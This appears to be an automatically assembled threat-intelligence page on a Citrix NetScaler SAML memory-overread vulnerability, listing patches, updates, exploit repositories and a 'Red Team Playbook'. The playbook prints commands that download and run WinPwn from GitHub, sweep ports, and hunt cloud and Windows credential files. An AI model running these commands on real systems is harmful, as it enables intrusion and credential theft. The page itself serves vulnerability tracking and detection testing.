CVE-2026-3055
Overview
This vulnerability is a memory overread caused by insufficient input validation within the SAML Identity Provider (IDP) functionality of NetScaler ADC and NetScaler Gateway. Specifically, the flaw arises when processing malformed SAML assertions or requests, leading to out-of-bounds memory access. The affected components are the NetScaler ADC and NetScaler Gateway platforms configured as SAML IDPs, where input handling routines fail to properly verify data boundaries.
Vulnerability Description
Insufficient input validation in NetScaler ADC and NetScaler Gateway when configured as a SAML IDP leading to memory overread
Impact
An unauthenticated remote attacker can exploit this vulnerability by sending specially crafted SAML authentication requests to a NetScaler ADC or Gateway configured as a SAML IDP. Due to the network attack vector (AV:N), low attack complexity (AC:L), no privileges or user interaction required (PR:N/UI:N), the attacker can induce memory overread conditions remotely. This may lead to information disclosure or destabilization of the affected service, potentially enabling further exploitation or denial of service scenarios within enterprise environments relying on these devices for authentication.
Solution
Citrix has released a security advisory (CTX696300) detailing the vulnerability and providing patches for affected NetScaler ADC and NetScaler Gateway versions. Administrators should apply the latest firmware updates as specified in the advisory to remediate the issue. The advisory covers all affected product variants, including FIPS and NDCPP configurations. No alternative workarounds are documented; therefore, prompt application of vendor-supplied patches is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from insufficient input validation within specific configurations of the NetScaler ADC and NetScaler Gateway when utilized as a SAML Identity Provider (IDP). This flaw allows for memory overread, which can lead to unauthorized access to sensitive information stored in memory. The lack of stringent input validation mechanisms means that an attacker could exploit this vulnerability by crafting malicious SAML requests that bypass the intended validation checks. As a result, the affected systems may inadvertently expose sensitive data or even allow for unauthorized actions to be performed on behalf of legitimate users.
Attack vectors for this vulnerability primarily involve the manipulation of SAML assertions or requests sent to the NetScaler devices. An attacker could leverage social engineering techniques to trick a user into initiating a SAML authentication process, or they could directly target the SAML endpoint with crafted requests. Once the malicious input is processed, the insufficient validation could lead to memory overreads, potentially revealing sensitive information such as user credentials, session tokens, or other confidential data. The exploitation of this vulnerability could be executed remotely, making it particularly dangerous as it requires minimal interaction from the victim.
The real-world impact of this vulnerability is significant, especially for organizations that rely on the affected products for secure authentication and access control. The potential for data leakage poses a serious business risk, as it could lead to unauthorized access to sensitive systems and data, resulting in financial losses, reputational damage, and legal ramifications. Additionally, the high CVSS score of 9.8 indicates that this vulnerability is critical and should be prioritized for remediation. Organizations that fail to address this issue may find themselves vulnerable to targeted attacks, especially if they are in sectors that handle sensitive information, such as finance, healthcare, or government.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and vulnerability scans should be conducted to identify any instances of the affected products that may be improperly configured or lacking necessary updates. Additionally, organizations should enforce strict input validation rules and employ web application firewalls (WAFs) to filter out potentially malicious requests before they reach the NetScaler devices. It is also crucial to stay informed about security patches and updates provided by Citrix, ensuring that all systems are running the latest versions that address known vulnerabilities.
In conclusion, the insufficient input validation vulnerability within the NetScaler ADC and Gateway presents a serious threat to organizations utilizing these products as SAML IDPs. The potential for memory overread and subsequent data exposure underscores the importance of rigorous security practices and timely remediation efforts. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their risk profile and safeguard their sensitive information against exploitation.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2026-3055, with telemetry indicating a modest rise in exploit attempts targeting vulnerable NetScaler ADC and Gateway devices configured as SAML Identity Providers. Concurrently, the Exploit Prediction Scoring System (EPSS) score has risen notably, reflecting a growing likelihood of exploitation in the wild. This upward trend, while not yet rapid or widespread, signals increased adversary interest and testing of available proof-of-concept exploits, which have recently proliferated across public repositories. The availability of multiple functional exploit tools capable of extracting sensitive session data elevates the risk of unauthorized access and full compromise of affected appliances. Consequently, the threat landscape for this vulnerability has intensified, warranting heightened vigilance. Although ransomware use remains unconfirmed, the potential for session hijacking and appliance takeover could facilitate broader attack chains. Overall, these developments modestly elevate the threat level from high to critical, underscoring an urgent need for defenders to monitor exploit activity closely.
Update 2 — May 21, 2026
Since the initial report, CSURFACE threat intelligence has detected the emergence of a Metasploit module targeting CVE-2026-3055, significantly lowering the technical barrier for exploitation. This development coincides with a marked increase in the Exploit Prediction Scoring System (EPSS) score, which has surged by over 60%, reflecting heightened likelihood of exploitation in the wild. Although our telemetry indicates a reduction in detection events, this may suggest a shift towards more targeted or stealthy attack methods rather than diminished adversary interest. The availability of a widely used exploitation framework module, combined with multiple proof-of-concept tools, broadens the attacker base and accelerates potential weaponization. Consequently, the threat level escalates from high to critical, underscoring an urgent need for defenders to intensify monitoring and incident response readiness. This shift also elevates the risk of unauthorized session hijacking and full appliance compromise, which could facilitate lateral movement or persistent access within affected environments. While ransomware involvement remains unconfirmed, the expanded exploit landscape increases the potential for this vulnerability to be leveraged as an initial access vector in complex attack chains.
Update 3 — July 09, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2026-3055, indicating a modest uptick in attempts to exploit the memory overread vulnerability in NetScaler ADC and Gateway devices configured as SAML identity providers. While the overall exploitation trend remains stable, the emergence of additional proof-of-concept tools and scanners in open-source repositories reflects growing attacker interest and expanding capabilities to identify and leverage vulnerable systems. This subtle rise in telemetry signals a persistent adversary focus, which, combined with the critical severity of the vulnerability, sustains a heightened risk posture. Although ransomware usage linked to this vulnerability remains unconfirmed, the broader availability of exploitation resources enhances the potential for this flaw to be integrated into multi-stage attack campaigns. Consequently, defenders should recognize this development as a reinforcement of the existing threat landscape, maintaining the vulnerability’s critical threat level without escalation but underscoring the need for continued vigilance.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:ndcpp:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Citrix ADC (NetScaler) CVE-2026-3055 Scanner
auxiliary/scanner/http/citrix_netscaler_cve_2026_3055
|
watchTowr, sfewer-r7 | Unknown | - | View |
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
NetVanguard-cmd/CVE-2026-3055
|
NetVanguard-cmd | 0 | 0 | 2026-04-19 | View |
|
0xBlackash/CVE-2026-3055
CVE-2026-3055
|
0xBlackash | 0 | 0 | 2026-03-29 | View |
|
fevar54/CVE-2026-3055---Citrix-NetScaler-Memory-Overread-PoC
Exploit funcional para CVE-2026-3055 en Citrix NetScaler ADC y Gateway. Aprovecha memory overread en endpoint /wsfed/pas...
|
fevar54 | 0 | 0 | 2026-03-31 | View |
|
fevar54/CVE-2026-3055-Scanner---Herramienta-de-Detecci-n
Herramienta de detección para CVE-2026-3055 que identifica NetScaler ADC y Gateway vulnerables a memory overread. Realiz...
|
fevar54 | 0 | 0 | 2026-03-31 | View |
|
l0lsec/check-cve-2026-3055-netscaler
Low-impact probe for Citrix NetScaler CVE-2026-3055 (SAML IdP memory overread)
|
l0lsec | 0 | 0 | 2026-04-01 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-540 | Overread Buffers |
33%
|
Low | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-3055 |
| support.citrix.com |
GitHub CVE
|
https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300 |
| labs.watchtowr.com |
NVD API
Exploit
Third Party Advisory
|
https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-3055 |